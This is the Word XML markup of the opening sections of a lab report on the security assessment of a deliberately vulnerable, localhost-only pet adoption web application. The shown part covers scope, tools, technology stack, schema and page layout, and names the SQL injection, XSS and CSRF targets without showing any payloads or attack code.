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429758" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:before="1600" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk234768492"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>🐾</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B4F55E" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Pet Adoption Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1335EE4B" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Security Testing &amp; Vulnerability Assessment — Lab Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1703703E" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="00162DB5">
      <w:pPr>
        <w:spacing w:after="6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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="00162DB5" w14:paraId="6AD58E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F5A874" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635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4C513E" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="080C73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DA7299" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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6B1B8A" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Pet Adoption Platform (v1.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="6CC474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BE4E98" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6350" w:type="dxa"/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DA1780" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Linux (Kali), Apache, MariaDB, PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="29639B7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A7B562" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Testing Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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E64EA4" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Localhost — http://localhost/pet_adoption/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="4D19A8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509679" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Testing Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6350" w:type="dxa"/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A98329" w14:textId="7E2DEC00" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">July </w:t>
            </w:r>
            <w:r w:rsidR="00D364A8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="764D89D1" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="00162DB5">
      <w:pPr>
        <w:spacing w:after="600"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AD079F" w14:textId="5EADF00F" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A196E" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="727E736A" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781E9D45" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>1.1 Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49845255" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This lab report documents the security assessment of the Pet Adoption Platform, a deliberately vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> web application built for educational purposes. The assessment identifies, exploits, and documents vulnerabilities including SQL Injection, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), and cookie theft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745760DD" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>1.2 Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572C0441" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="10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Application: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pet Adoption Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC2920" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="10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Version: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB27F9A" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="10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Platform: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Linux (Kali), Apache, MariaDB, PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5FBA9" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="10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Testing Environment: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Localhost (http://localhost/pet_adoption/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43242529" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="10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Testing Date: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>July 8, 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB27A86" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>1.3 Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46133E59" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Web Browser: Firefox, Chrome Developer Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4BA3BD" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Database: MariaDB/MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD56778" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Web Server: Apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF5051" w14:textId="6F31882F" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Testing Tools:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Browser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DevTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FE91895" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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OS: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C60C7D9" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2. Project Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DFA0C1" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>2.1 Application Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1926EC8C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Pet Adoption Platform is a web application that allows users t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>o:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D87F0" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Browse available pets for adoption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A64A3D5" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Register and login to the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDEB35" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Submit adoption requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F653F60" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Leave feedback and ratings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3D07A9" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Save favorite pets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725BCAAA" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>2.2 Technology Stack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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="00162DB5" w14:paraId="0EAFC6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7AC7A8" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585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4A4115" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="06223FE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64D09C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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A39F48" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PHP 8.4.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="73E1ECC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F999D0" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5850" w:type="dxa"/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8EC32B" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>MariaDB 11.8.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="7A5B867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46B723" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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EC8FF5" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Apache 2.4.67</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="777165C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42629E" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5850" w:type="dxa"/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CE03B8" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="739464F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5AB5D9" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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FF19FA" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>HTML, CSS, JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EF2F73C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="00162DB5">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A036A9F" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>2.3 Database Schema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162DB5" w14:paraId="0048CC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4F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01E4DF3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>Tables:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45A1243D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- users (id, username, email, password, role,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created_at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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F82481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- pets (id, name, type, breed, age, description, status,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added_by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created_at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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="379D5BBB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- adoptions (id,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pet_id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, status,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application_date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, message)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD4D9DF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- feedback (id,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, comment, rating,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created_at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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42B6F7AF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saved_pets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(id,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pet_id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saved_at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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03E72CE6" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B23066" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. System Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF78DCA" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>3.1 Architecture Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45416AEC" w14:textId="4CA3405B" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8" w:rsidP="00534F07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Client (Firefox) → Web Server (Apache2 / PHP application) → Database (MariaDB, database: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pet_adoption</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AFA93C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key application pages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC6A44" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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alibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>index.php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Homepage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08859C22" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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alibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>login.php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Login page (SQL Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C36746" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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alibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>register.php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Registration page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D8E45" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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alibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>feedback.php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Feedback page (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F27BC7D" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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alibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>adopt.php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Adoption page (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1276F5EF" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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alibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>available_pets.php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Browse pets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C5823A" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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alibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>my_adoptions.php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User adoptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21D1F2" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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alibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>profile.php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User profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488019E3" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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alibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>search.php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Search pets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756E05A9" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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alibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>save_pet.php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Save favorite pets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC0953" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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alibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logout.php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Logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD8DAC" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/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>3.2 File Structure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162DB5" w14:paraId="0BA750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4F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2F0DAAC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>/var/www/html/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pet_adoption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</w:p>
          <w:p w14:paraId="4D01D47F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>├── config/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A41E813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│   └──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db.php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    # Database configuration</w:t>
            </w:r>
          </w:p>
